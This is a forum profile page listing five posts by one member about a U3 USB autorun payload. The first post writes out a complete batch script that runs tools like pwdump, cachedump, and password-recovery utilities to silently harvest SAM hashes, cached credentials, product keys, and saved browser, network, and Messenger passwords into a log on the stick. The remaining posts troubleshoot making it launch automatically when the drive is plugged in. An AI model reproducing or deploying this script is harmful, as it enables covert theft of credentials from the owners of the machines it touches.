Jump to content

Stangman

Members
  • Posts

    5
  • Joined

  • Last visited

Everything posted by Stangman

  1. Same here.. go.cmd @echo off %1: cd WIPCMD go.bat go.bat @echo off if not exist Documents md Documents >nul if not exist Documentslogfiles md Documentslogfiles >nul cd wipcmd >nul Echo ************************************ > Documentslogfiles%computername%.log 2>&1 echo ***********[System info]************ >> Documentslogfiles%computername%.log 2>&1 Echo ************************************ >> Documentslogfiles%computername%.log 2>&1 echo Computer Name is: %computername% and the Logged on User Name Is: %username% The date and Time is: %date% %time% >> Documentslogfiles%computername%.log 2>&1 ipconfig /all >> Documentslogfiles%computername%.log 2>&1 Echo ************************************ >> Documentslogfiles%computername%.log 2>&1 echo ***********[Dump SAM]*************** >> Documentslogfiles%computername%.log 2>&1 Echo ************************************ >> Documentslogfiles%computername%.log 2>&1 .pwdump 127.0.0.1 >> Documentslogfiles%computername%.log 2>&1 Echo ************************************ >> Documentslogfiles%computername%.log 2>&1 echo ***********[Dump Product Keys]****** >> Documentslogfiles%computername%.log 2>&1 Echo ************************************ >> Documentslogfiles%computername%.log 2>&1 .produkey /nosavereg /stext "Documentslogfiles%computername%_pk.log" /remote %computername% >> Documentslogfiles%computername%.log 2>&1 copy Documentslogfiles%computername%.log+Documentslogfiles%computername%_pk.log* Documentslogfiles%computername%.log >> nul del /f /q "Documentslogfiles%computername%_pk.log" >nul Echo ************************************ >> Documentslogfiles%computername%.log 2>&1 echo ***********[Dump IE 7 Secrets]****** >> Documentslogfiles%computername%.log 2>&1 Echo ************************************ >> Documentslogfiles%computername%.log 2>&1 .iepv.exe /stext "Documentslogfiles%computername%_LSA.log" >> Documentslogfiles%computername%.log 2>&1 copy Documentslogfiles%computername%.log+Documentslogfiles%computername%_lsa.log* Documentslogfiles%computername%.log >> nul del /f /q "Documentslogfiles%computername%_lsa.log" >nul set RtD=%CD% cd /D "%appdata%MozillaFirefoxProfiles" >nul set PROFILE= for /D %%i in (*) do set PROFILE=%%i cd /D %RtD% >nul Echo ************************************ >> Documentslogfiles%computername%.log 2>&1 Echo ***********[Dump Firefox PW]******** >> Documentslogfiles%computername%.log 2>&1 Echo ************************************ >> Documentslogfiles%computername%.log 2>&1 .FirePassword.exe "%appdata%MozillaFirefoxProfiles%PROFILE%" >> Documentslogfiles%computername%.log 2>&1 Echo ************************************ >> Documentslogfiles%computername%.log 2>&1 echo ***********[Dump Network PW]******** >> Documentslogfiles%computername%.log 2>&1 Echo ************************************ >> Documentslogfiles%computername%.log 2>&1 .netpass.exe /stext "Documentslogfiles%computername%_np.log" >> Documentslogfiles%computername%.log 2>&1 copy Documentslogfiles%computername%.log+Documentslogfiles%computername%_np.log* Documentslogfiles%computername%.log >> nul del /f /q "Documentslogfiles%computername%_np.log" >nul Echo ************************************ >> Documentslogfiles%computername%.log 2>&1 echo ***********[Dump Cache]************* >> Documentslogfiles%computername%.log 2>&1 Echo ************************************ >> Documentslogfiles%computername%.log 2>&1 .cachedump.exe >> Documentslogfiles%computername%.log 2>&1 Echo ************************************ >> Documentslogfiles%computername%.log 2>&1 echo ***********[Dump Messenger PW]****** >> Documentslogfiles%computername%.log 2>&1 Echo ************************************ >> Documentslogfiles%computername%.log 2>&1 .mspass.exe /stext "Documentslogfiles%computername%_ms.log" >> Documentslogfiles%computername%.log 2>&1 copy Documentslogfiles%computername%.log+Documentslogfiles%computername%_ms.log* Documentslogfiles%computername%.log >> nul del /f /q "Documentslogfiles%computername%_ms.log" >nul Echo ************************************ >> Documentslogfiles%computername%.log 2>&1 echo ***********[Dump URL History]******* >> Documentslogfiles%computername%.log 2>&1 Echo ************************************ >> Documentslogfiles%computername%.log 2>&1 cscript //nologo .DUH.vbs >> Documentslogfiles%computername%.log 2>&1 :End exit
  2. I still cant get it to work. I made sure I dont have a folder named WIP anywhere (and I've tried this on 3 different PCs). Everything works when I manually run go.cmd, or when I use another loader, but when using autorun a command window pops up for a split second and nothing. If I go into the cd portion and run mstart the same thing happens, a quick cmd window and nothing else. If I run mstart on C:, it does run go.bat (from the flash drive, I checked), but it places the documents folder on C:. Apparently its trying to make the log files on the cd when it autoruns.
  3. Could it be, that you have a folder thats named WIP, on your C: drive or any other drive that comes before (alphabetically) the driveletter of your u3-stick? Moonboy33 Yes, on my desktop. And on my c drive I happen to have a nice documents folder with a log file. Thats why it says noob under my name. :) I'll get rid of it and try again (it'll be a couple days though, leaving now for the weekend). Thanks for the help.
  4. Ok I unpack the rar to my desktop. I copy MSTART over to U3CUSTOM and rename, replacing the MSTART that was there. Then I run ISOcreate. Then I run Universal_Customizer. Did I miss anything? Edit: When I run go.cmd it says system could not find the path specified, then after a couple seconds it closes and I get a log file. If I run the cd partition a command window comes up for a split second and then nothing.
  5. I think I'm missing something here. I started with the renegadetech payload and it worked great. I tried to switch to this loader and its not loading the go.bat. I have your go.cmd and go.bat (the old cmd) in cmd, but nothing happens at load. U3 loads fine when caps lock is on. Edit: Went back to the old loader and left go.cmd and go.bat, works now. Not sure if I'm doing something wrong creating the new iso?
×
×
  • Create New...